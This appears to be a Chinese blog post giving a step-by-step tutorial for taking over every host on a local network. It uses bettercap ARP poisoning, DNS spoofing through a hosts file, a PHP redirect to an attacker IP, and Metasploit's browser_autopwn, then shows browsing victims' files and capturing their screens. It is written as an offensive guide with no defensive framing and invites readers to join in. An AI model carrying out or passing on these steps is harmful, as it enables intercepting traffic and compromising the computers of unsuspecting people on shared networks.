手把手教你如何黑掉整个内网

现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个pay可用

NetSmell 出品

日出东方,唯我不败;千秋万代,一统江湖!

教主文成武德、泽被苍生 ,千秋万载,一统江湖!

测试主机:kali 2016.2

工具:bettercap、metasploit、dnsspoof、armitage

前期准备工作

在kali下并没有集成bettercap,所以我们需要自己安装

手把手教你如何黑掉整个内网0

安装完成

手把手教你如何黑掉整个内网1

启动postgresql服务

手把手教你如何黑掉整个内网2

metasploit数据库初始化

手把手教你如何黑掉整个内网3

查看数据库链接状态,如果这里显示数据库未连接可以参考:传送门 连接数据库

手把手教你如何黑掉整个内网4

启动armitage(关于armitage

手把手教你如何黑掉整个内网5

准备一个hosts文件(用于DNS欺骗)

手把手教你如何黑掉整个内网6
更改:刚才试了一下,在hosts文件中加上端口号好像会出现一些意料不到的问题。这里我们换个思路,直接到ip地址不加端口号,然后开启apache服务,然后将下面的代码保存为index.php放在根目录下(/var/www/html/)

<?php header("Location:http://10.167.33.1:8080"); ?>

这样在DNS欺骗后会跳到指定ip,然后在通过php重定向到我们的payload。

还有一种方法是在下边启动浏览器自动攻击插件时,将端口号直接改成80端口。
/**************************************zhun bei wan cheng *****************************************/
启动浏览器自动攻击模块:browser_autopwn

手把手教你如何黑掉整个内网7

等待他将所有payload加载完成

手把手教你如何黑掉整个内网8

arp攻击(执行:bettercap -X)

手把手教你如何黑掉整个内网9

DNS欺骗(忘了截图 图是后补的 所以参数有点不一样)

手把手教你如何黑掉整个内网10

现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个pay可用

手把手教你如何黑掉整个内网11

查看文件
手把手教你如何黑掉整个内网12

屏幕截图
手把手教你如何黑掉整个内网13

当然功能远远不止这些,更多好玩的可以自己探索。

水平有限,有错误请指出。
如果有一块学习的同志私聊我上车。

上车的有点多,要超载了,关注公众号吧,公众号更新会比知乎的更全面

公众号:sssie95zz

显示余下内容
相关文章:
  1. 盘点最受恐怖分子钟爱的科技工具
  2. 年涨幅260%的比特币 为何成为黑客的 “最佳选择”?
  3. 浙大学生在顶级黑客大赛上夺冠 十秒钟攻破谷歌智能手机
  4. 《权利的游戏》第七季泄露始末 黑客是如何侵入HBO的?
  5. 揭秘NSA秘密黑客组织方程式
  6. iPhone比安卓机安全?在黑客眼里这些都不堪一击
  7. 记者实测:短信验证码+身份证,就能挪走你手机里所有的钱
  8. 发现 WannaCry 致命开关的英国黑客居然被FBI抓了!
  9. 不通过数据接口 黑客通过分析硬盘震动就能读取数据
  10. 黑客可以利用你电脑的LED灯传输数据盗取资料
 

发表评论

您的电子邮箱地址不会被公开。